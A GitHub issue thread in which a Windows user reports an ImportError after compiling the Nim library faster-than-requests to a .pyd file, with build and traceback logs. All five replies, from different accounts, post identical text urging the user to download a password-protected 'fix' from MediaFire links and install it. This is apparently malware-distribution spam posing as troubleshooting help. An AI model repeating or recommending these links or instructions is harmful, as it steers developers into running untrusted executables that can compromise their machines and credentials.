### ISSUE TITLE
ImportError: dynamic module does not define module export function (PyInit_faster_than_requests)

### ISSUE THREAD

**Issue by itschasa** [juancarlospaco/faster-than-requests#216]
### Architecture

x86_64 (Default)

### Operating System

Windows

### Disk

SSD (Solid)

### Memory

16 Gigabytes

### CPU Cores

6 CPU Cores

### Internet Connection

Optical Fiber (very fast)

### What is your web browser?

Chrome/Chromium

### Device

Desktop PC

### Where are you from?

United Kingdom

### What happened?

ive downloaded nim, and have compiled to a .pyd file successfully. however when i import the lib, it gives the error `ImportError: dynamic module does not define module export function (PyInit_faster_than_requests)`

![image](https://user-images.githubusercontent.com/79016507/235785058-ea331124-4c22-41d6-934a-af1786d0c4d3.png)

inside faster_than_requests
![image](https://user-images.githubusercontent.com/79016507/235785110-9408a520-3157-406e-b175-69d5534da5af.png)

### Standard Output Logs

```shell
nim c -d:ssl -d:danger --app:lib --tlsEmulation:on --out:faster_than_requests.pyd faster_than_requests.nim

Hint: used config file 'C:\Users\chasa\.choosenim\toolchains\nim-1.6.12\config\nim.cfg' [Conf]
Hint: used config file 'C:\Users\chasa\.choosenim\toolchains\nim-1.6.12\config\config.nims' [Conf]
Hint: used config file 'D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim.cfg' [Conf]
......................................................................................................................
D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim(140, 8) template/generic instantiation of `fetch` from here
D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim(91, 7) Warning: The bare except clause is deprecated; use `except CatchableError:` instead [BareExcept]
D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim(140, 8) template/generic instantiation of `fetch` from here
D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim(94, 5) Warning: The bare except clause is deprecated; use `except CatchableError:` instead [BareExcept]
D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim(144, 8) template/generic instantiation of `fetch` from here
D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim(91, 7) Warning: The bare except clause is deprecated; use `except CatchableError:` instead [BareExcept]
D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim(144, 8) template/generic instantiation of `fetch` from here
D:\Coding\personal shit\sniper test py\faster_than_requests\faster_than_requests.nim(94, 5) Warning: The bare except clause is deprecated; use `except CatchableError:` instead [BareExcept]
Hint:  [Link]
Hint: gc: refc; threads: on; opt: speed; options: -d:danger
64499 lines; 1.956s; 93.77MiB peakmem; proj: faster_than_requests; out: faster_than_requests.pyd [SuccessX]



py main.py

Traceback (most recent call last):
  File "D:\Coding\personal shit\sniper test py\main.py", line 23, in <module>
    import faster_than_requests
  File "D:\Coding\personal shit\sniper test py\faster_than_requests\__init__.py", line 7, in <module>
    from . faster_than_requests import *
ImportError: dynamic module does not define module export function (PyInit_faster_than_requests)
```

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
